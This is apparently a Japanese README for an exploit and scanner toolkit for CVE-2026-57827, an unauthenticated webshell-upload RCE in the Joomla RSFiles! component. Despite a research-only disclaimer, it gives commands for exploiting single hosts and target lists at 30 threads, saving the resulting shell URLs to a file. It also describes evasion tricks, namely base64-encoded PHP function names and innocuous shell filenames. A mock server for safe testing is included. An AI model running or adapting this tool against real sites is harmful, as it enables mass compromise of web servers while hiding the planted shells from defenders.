
免責事項 — 許可された使用のみ。 これはセキュリティ研究および防御テストのための概念実証(PoC)です。 使用は自分が所有するシステム、または明示的な書面による許可を得た システムのみに限定されます。同意なく第三者に対して悪用することは 違法です。責任ある開示の立場については SECURITY.md を参照してください。
Joomla 用 RSFiles!(com_rsfiles)コンポーネント、バージョン
< 1.17.12(1.17.12 で修正、CVSS 9.8 / 10.0)における
CVE-2026-57827 のエクスプロイト+スタンドアロン検出器です。
フロントエンドのアップロードは2つのタスクに分割されています:
rsfiles.checkupload — 事前ゲート(権限+拡張子の許可リスト)rsfiles.upload — 書き込みメソッド(権限チェックなし、ファイルタイプチェックなし、CSRF対策なし)書き込みタスクは事前ゲートをスキップして直接呼び出せるため、
認証されていない攻撃者が実行可能な .php ファイルを公開フォルダに
アップロードして実行できます → 認証なしRCE。
すべてのモジュールは同じディレクトリに置く必要があります(相互にインポートするため)。
python3 -m pip install -r requirements.txt # or just: pip install requests
python rsfiles_detect.py -t example.com
Host : example.com
RSFiles! : YES v1.17.11
Protocol : https
Status : VULNERABLE (below 1.17.12)
複数ホスト:
python rsfiles_detect.py -f hosts.txt
python cve_2026_57827.py -t example.com
成功すると、ツールはシェルのURLをランダムトークン付きで表示し、コマンドの 出力も表示します — その出力がRCEの証明です。
python cve_2026_57827.py -f targets.txt --threads 30 -o shells.txt --csv report.csv
# Terminal 1 — start the mock (vulnerable)
python mock_server.py 8000 1.17.11
# Terminal 2 — scan it
python rsfiles_detect.py -t 127.0.0.1:8000
python cve_2026_57827.py -t 127.0.0.1:8000
1.17.11 / 1.17.10 = 脆弱 · 1.17.12 = パッチ適用済み
payload.py):各動作(ゲート、アップロード、実行、
削除、一覧)は1つの小さな関数に対応。実行関数名はbase64エンコードされるため、
system のような生の名前がファイルのバイト列に現れません。cache7f31.php)を使用し、従来の
隠しドットファイル形式のシェル名は使いません。common.base_of() 経由で行います。スタイルは、公開されているJoomlaコンポーネントのエクスプロイト集(例:
incredibleindishell/joomla-vulnerabilities)と、このCVEに関する
RSJoomla/mysites.guruのアドバイザリ記事に基づいています。
MIT — LICENSE を参照。研究・防御用途のみ。
| File | 目的 |
|---|
cve_2026_57827.py | エクスプロイト+スキャナ+CLI(エントリポイント) |
rsfiles_detect.py | スタンドアロン検出モジュール(エクスプロイトなし)— 独自のCLIも搭載 |
payload.py | モジュール式・コンパクトなPHPペイロードビルダー |
common.py | 共有HTTPクライアント、設定、ヘルパー |
mock_server.py | テスト用の安全なローカルシミュレーション |
| Flag | 説明 |
|---|
--threads N | 並行数(デフォルト30) |
--proxy URL | プロキシ経由でルーティング(Burp/ZAP) |
--timeout N | リクエストごとのタイムアウト(秒) |
--no-cleanup | アップロードしたシェルを保持(デフォルト:RCE後に自動削除) |
-o FILE | RCE URLを保存 |
--csv FILE | 完全な構造化レポート |
--debug / -v | リクエストレベルの詳細ログ |